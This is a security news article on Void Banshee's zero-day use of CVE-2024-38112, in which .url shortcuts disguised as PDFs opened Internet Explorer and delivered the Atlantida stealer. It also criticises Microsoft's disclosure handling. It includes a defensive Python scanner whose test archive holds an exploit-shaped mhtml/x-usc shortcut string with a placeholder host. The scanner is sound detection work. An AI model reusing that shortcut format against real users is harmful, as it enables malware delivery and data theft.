Void Banshee APT exploited “lingering Windows relic” in zero-day attacks
A zero-day exploit for CVE-2024-38112, a recently patched Windows MSHTML vulnerability, was wielded by an APT group dubbed Void Banshee to deliver malware to targets in North America, Europe, and Southeast Asia, threat hunters with Trend Micro’s Zero Day Initiative (ZDI) have shared.
How Void Banshee used CVE-2024-38112
As previously explained by Check Point researcher Haifei Li, the attackers used files that were specially crafted to exploit the vulnerability but were made to look like PDFs.
“The threat actor leveraged CVE-2024-38112 to execute malicious code by abusing the MHTML protocol handler and x-usc directives through internet shortcut (URL) files. Using this technique, the threat actor was able to access and run files directly through the disabled Internet Explorer instance on Windows machines,” Trend Micro researchers noted.
“This MHTML code execution vulnerability was used to infect users and organizations with Atlantida malware.”
The attack chain (Source: Trend Micro)
The threat actors used spear-phishing tactics to direct targets to ZIP files containing copies of books in PDF format, along with malicious files disguised as PDFs. The ZIP files were hosted on online libraries, cloud sharing sites, Discord, and compromised websites.
“Some PDF lures we uncovered during our analysis of the Void Banshee campaign include textbooks and reference material such as Clinical Anatomy, which suggests the campaign is targeting highly skilled professionals and students who often use reference materials and places where digital copies of books are collected,” the threat hunters say.
Victims thought that they were opening PDF files, but were actually running an internet shortcut (.url) file that exploited the flaw to launch the remnants of the Internet Explorer browser and direct it to a compromised website hosting a malicious HTML Application (HTA).
The HTA file contained a Visual Basic Script that used PowerShell to download an additional script, execute it in a new process, fetch further trojan loaders and, finally, deliver the Atlantida stealer.
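The two ingredients the researchers describe (an internet shortcut whose URL= value uses the mhtml: protocol handler and carries an x-usc directive, hidden behind a PDF-looking name inside a ZIP) are straightforward to triage before a user ever double-clicks. The following scanner is an added example for this article, not code from Trend Micro or Check Point: it parses the INI-style .url files in an archive, flags the mhtml: scheme, the x-usc directive and a disguised double extension, and runs against a constructed lure archive built inline. The exact "!x-usc:" spelling, the hostnames and the file names are assumptions for illustration, not indicators from the campaign.

```python
import io
import re
import zipfile

# The mhtml: scheme hands the URL to the MSHTML/Internet Explorer engine;
# the x-usc directive is the second element the researchers describe.
# The "!x-usc:" spelling is an assumption made for this example.
MHTML_SCHEME = re.compile(r"^\s*mhtml:", re.IGNORECASE)
X_USC_DIRECTIVE = re.compile(r"!x-usc:", re.IGNORECASE)


def parse_internet_shortcut(data: bytes) -> dict:
    """Return the key/value pairs of the [InternetShortcut] section of a .url file."""
    text = data.decode("utf-8", errors="replace")
    fields, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "internetshortcut"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def assess_shortcut(name: str, data: bytes) -> list:
    """List the suspicious traits of one .url file (empty list means nothing found)."""
    findings = []
    url = parse_internet_shortcut(data).get("url", "")
    if MHTML_SCHEME.search(url):
        findings.append("mhtml: scheme in URL= (routed to the MSHTML/IE engine)")
    if X_USC_DIRECTIVE.search(url):
        findings.append("x-usc directive in URL=")
    # "Book.pdf.url" style double extension: the shortcut is dressed up as a PDF.
    base = name.rsplit("/", 1)[-1].lower().rstrip()
    if base.endswith(".url") and base[:-4].rstrip().endswith(".pdf"):
        findings.append("disguised as a PDF (double extension)")
    return findings


def scan_zip(zip_bytes: bytes) -> dict:
    """Map each suspicious member of a ZIP archive to its findings."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info.filename)
            # Match on extension or on content, so a renamed .url is still inspected.
            looks_like_url = info.filename.lower().rstrip().endswith(".url") or \
                data.lstrip()[:18].lower().startswith(b"[internetshortcut]")
            if not looks_like_url:
                continue
            findings = assess_shortcut(info.filename, data)
            if findings:
                report[info.filename] = findings
    return report


def build_sample_zip() -> bytes:
    """Constructed lure archive: a benign decoy PDF, a harmless shortcut and one
    shortcut shaped like the technique described above (placeholder hosts)."""
    malicious_url = (
        "[InternetShortcut]\r\n"
        "URL=mhtml:http://lure.example/books/index.html"
        "!x-usc:http://lure.example/books/index.html\r\n"
    )
    benign_url = "[InternetShortcut]\r\nURL=https://example.org/\r\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Clinical Anatomy/Chapter 1.pdf", b"%PDF-1.4\n% benign decoy\n")
        zf.writestr("Clinical Anatomy/Clinical Anatomy.pdf.url", malicious_url)
        zf.writestr("Clinical Anatomy/README.url", benign_url)
    return buf.getvalue()


if __name__ == "__main__":
    for member, findings in scan_zip(build_sample_zip()).items():
        print(member)
        for finding in findings:
            print("  -", finding)
```

Only the disguised shortcut is reported; the decoy PDF and the plain https:// shortcut pass. The check on content as well as extension matters because the .url extension is the part of the name a victim is least likely to notice, and after the July 2024 fix the mhtml: scheme inside a .url file is a strong signal in its own right, since legitimate shortcuts have no reason to use it.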
“[The stealer] targets sensitive information from various applications, including Telegram, Steam, FileZilla, various cryptocurrency wallets, and web browsers. This malware focuses on extracting stored sensitive and potentially valuable data, such as passwords and cookies, and it can also collect files with specific extensions from the infected system’s desktop,” they noted.
“Moreover, the malware captures the victim’s screen and gathers comprehensive system information. The stolen data is then compressed into a ZIP file and transmitted to the attacker via TCP.”
According to Check Point, Void Banshee have been exploiting CVE-2024-38112 for over a year.
“The ability of APT groups like Void Banshee to exploit disabled services such as IE poses a significant threat to organizations worldwide,” Trend Micro threat hunters noted.
“Since services such as IE have a large attack surface and no longer receive patches, it represents a serious security concern to Windows users. Furthermore, the ability of threat actors to access unsupported and disabled system services to circumvent modern web sandboxes such as IE mode for Microsoft Edge highlights a significant industry concern.”
Microsoft failing at coordinated vulnerability disclosure
Both Check Point and Trend Micro researchers noticed the exploitation of CVE-2024-38112 in mid-May 2024 and disclosed their findings to Microsoft. Microsoft released fixes for the vulnerability on the July 2024 Patch Tuesday that block the use of the MHTML protocol handler inside internet shortcut (.url) files, and credited Check Point in the vulnerability’s security advisory.
But both companies were surprised when Microsoft released the fixes without a heads-up to them.
“This is not the first time [Microsoft] telling us they’re going to patch the issue in month X but released the patch earlier without notifying us,” Li said, and noted that “coordinated disclosure can’t be just one-side coordination.”
Dustin Childs, head of threat awareness at the ZDI, pointed out other instances of researchers complaining about Microsoft’s lack of communication, and warned that making the coordinated vulnerability disclosure (CVD) process frustrating for researchers could have negative consequences for Microsoft.
“If you don’t offer a bounty payout and don’t coordinate with researchers or properly credit them, why in the world would anyone report bugs to you?” he asked.
For coordinated vulnerability disclosure to work, both parties – vendors and researchers – have certain responsibilities, he pointed out, and “it’s time to have the vendors step up and do theirs.”